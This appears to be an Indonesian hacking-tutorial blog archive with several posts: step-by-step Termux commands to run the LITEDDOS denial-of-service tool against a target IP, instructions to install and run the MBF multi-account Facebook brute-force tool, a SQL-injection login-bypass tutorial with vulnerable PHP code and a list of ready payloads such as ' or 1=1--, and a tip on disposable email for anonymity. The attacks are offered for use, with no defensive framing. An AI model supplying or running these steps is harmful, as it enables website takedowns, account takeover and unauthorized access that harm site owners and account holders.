Tampilkan postingan dengan label Anonymous. Tampilkan semua postingan
Tampilkan postingan dengan label Anonymous. Tampilkan semua postingan

Senin, 24 September 2018

Cara DDOS Di Android Dengan Termux Menggunakan LITEDDOS

Pada artikel kali ini saya akan memberikan tutorial cara DDOS di termux menggunakan LITEDDOS, DDOS Merupakan suatu serangan yang di lakukan terhadap suatu website dengan cara memberikan ping sebanyak-banyaknya dengan tujuan agar website tersebut down atau tidak bisa di akses kembali.





Yuk langsung saja kita ke tutorialnya.....

  • download aplikasi termux xbizvej untuk android
  • SINI
  • Karena tools LITEDDOS menggunakan bahasa pemrograman python, kalian harus menginstall bahasa python terlebih dahulu
  • $ apt install python2
  • Install juga git dengan perintah
  • $ apt install git
  • Selanjutnya kalian harus meng clone tools nya dari github dengan perintah
  • $ git clone https://github.com/4L13199/LITEDDOS
  • Tunggu sampai proses cloning selesai
  • Masuk ke directory nya dengan perintah
  • $ cd LITEDDOS
  • Sekarang kalian tinggal menjalankan tools nya dengan perintah
  • $ python2 LITEDDOS.py [ip target] [port] [jumlah ping]
  • Contoh
  • $ python2 LITEDDOS.py 148.118.86.37 80 1000

Sekian tutorial cara ddos di termux menggunakan LITEDDOS,

Jumat, 21 September 2018

Cara Hack FB Menggunakan MBF Di Termux

Pada artikel kali ini saya akan memberikan tutorial cara hack fb di termux menggunakan MBF (Multi BruteForce).

Tool ini merupakan tool yg bisa mengumpulkan ID dari daftar teman facebook dan anggota grup facebook kalian dan bekerja seperti bruteforce, yang membedakan adalah jika bruteforce biasa menggunakan 1 akun/ID dengan banyak password tetapi tool multi bruteforce ini bekerja dengan cara menggunakan banyak akun dan satu password.

Yuk langsung saja ke tutorialnya....

  • download aplikasi termux xbizvej untuk android
  • SINI
  • Install python2 dan git
  • $ pkg install python2 
    $ pkg install git
  • Install mechanize
  • pip2 install mechanize
  • Clone tool mbf nya dengan perintah
  • $ git clone https://github.com/pirmansx/mbf
  • Masuk ke directory nya
  • $ cd mbf
  • Jalankan tool nya dengan perintah
  • $ python2 MBF.py
  • Tampilan tool nya seperti dibawah ini


  • Pilih nomor 1 kemudian masukan email dan password kalian
  • Tunggu sampai proses nya selesai, tulis l kemudian masukan password

Rabu, 13 Juli 2016

SQL Injection Login Bypass

Di artikel kali ini saya mencoba menjelaskan cara melewati form login, sesuai namanya trik bypass berarti kita seolah menuju suatu tempat naek pesawat bukan dengan mobil yang lewat daratan dimana banyak rintangan terutama polantas !

berikut contoh sebuah command login.
Code:
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";

pada login yang valid (dari admin beneran), query akan menjadi seperti ini:

Code: 
$query = "select * from user where username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'";

query tersebut benar, dan benar2 melakukan pengecekan apakah user admin dengan password dlfjoew8r509ewrjeowru94efjlsj ada di database. jika tidak ada, return false dan tidak bisa login. jika ada, return true dan login.

Code:
username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'

kedua hal tersebut adalah statement yg di cek oleh query mysql.

namun ternyata pengecekan tersebut bisa di lewati dengan membuat query memberikan return true. kita hanya perlu membuat query selalu memberikan nilai benar. salah satu yg bisa kita lakukan adalah dengan menambahkan statement OR dengan statement yg memberikan return true. misal 1=1
Code:
OR 1=1

sehingga, kita perlu membuat query menjadi seperti ini :

Code: 
$query = "select * from user where username='admin' OR 1=1 AND password='dlfjoew8r509ewrjeowru94efjlsj' OR 1=1";

sehingga, user yg perlu kita masukan adalah :   admin' OR 1=1

beberapa admin yg cukup pintar, sudah membuat script query nya lengkap dengan tnda petik untuk menghindari error.

Code: 
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";

sehingga, dengan user : admin' OR 1=1        query akan menjadi seperti ini:

Code: 
$query = "select * from user where username='admin' OR 1=1' AND password='".md5($_POST['pass'])."'";

apa yg terjadi? query error karena kelebihan 1 tanda petik (lihat di belakang angka 1). dan tentu saja return yg di berikan tidak akan true. otomatis login gagal. untuk itu, kita perlu men-terminate script query tersebut. yaitu dengan memberikan comment mysql: --

Sehingga, user yg bisa kita masukkan adalah: admin' or 1=1--

Code: 
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";

dengan demikian, pengecekan di belakang coment akan di lewati. dan return dari query akan selalu true. perhatikan hukum logika berikut pada argument AND:

Code:
true AND true = true
true AND false = false
false AND false = false
false AND true = false

"AND" membandingkan true dengan true. jika kedua terbanding bernilai true, maka return true. jika salah satu atau kedua nya false, maka return false.

namun, berbeda dengan OR.

Code:
true OR true = true
true OR false = true
false OR true = true
false OR false =  false

jika salah satu TRUE, maka return akan memberikan TRUE.

Nah, perhatikan query setellah di inject:

Code: 
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";

1=1 ----> true
admin OR true = true

walapun user admin tidak pernah ada, maka query akan selalu memberikan nilai true, karena 1=1 adalah benar (true).

kita bisa tanpa memberikan username sama sekali. sehingga injeksi akan menjadi seperti ini jika kita menggunakan username dan password yg sama : ' or 1=1--

Code: 
$query = "select * from user where username='' or 1=1--' AND password='' or 1=1--'";

hal yg perlu kita perhatikan untuk bypass login adalah nilai true yg di keluarkan dan tidak terjadinya error pada script. sehingga penggunaan tanda baca sangat fatal pada injeksi seperti ini.

dengan memperhatikan output nilai true dan script berjalan dengan benar (tanpa error), kita bisa mencoba berbagai variasi username dan password untuk bisa login. misal

Code: 
a' or 'a'='a

dengan demikian, kita telah memanipulasi query menjadi seperti ini:

Code:
$query = "select * from user where username='a' or 'a'='a' AND password='a' or 'a'='a'";

tidak ada tanda kutip yang tidak tertutup, sehingga query berjalan lancar. statement OR memberikan nilai true, karena 'a'='a' adalah benar. mysql query memang sangat peka terhadap tanda petik. jangan ada tanda petik yg tidak tertutup.

berbagai variasi injeksi login seperti berikut:

Code: 
' or 1=1
' or '1'='1'
1' or 1=1
1' or '1'='1'
' or 'z'='z
dll, sesuai kreasi kita.

beberapa admin ada yg biasa menggunakan petik ganda dalam codingnya.

Code: 
$query = 'select * from user where username="admin" or 1=1-- AND password="'.md5($_POST["pass"]).'"';

hal tersebut sah sah aja, karena penggunaan tanda baca masih tepat. dengan demikian, injeksi akan sedikit berubah.

Code: 
" or 1=1
" or "1"="1
a" or "a"="a
" or "a"="a

Pengethuan tentang query mysql sangat penting dalam hal ini. sehingga kita bisa memanipulasi, memainkan injeksi untuk membypass login admin. karena, administrator biasanya berbeda orang berbeda pula cara coding. sehingga berbagai variasi injeksi akan sangat mungkin terjadi.

Selasa, 15 Maret 2016

Membuat Email Aktif Sementara


Sesuai dengan namanya, website ini menyediakan layanan email untuk 10 menit saja, dan bisa diperpanjang kalau kamu suka. Fiturnya sama seperti penyedia email lainnya, tapi akan expire dalam waktu 10 menit.
Selain agar tidak lama mikir id dan pass yang lupa ataupun buat akun email baru. Web ini juga akan membuat kalian tetap menjadi 'anonymous' di web apapun yang memerlukan verifikasi email.

Langsung klik bawah sini

10minutemail.com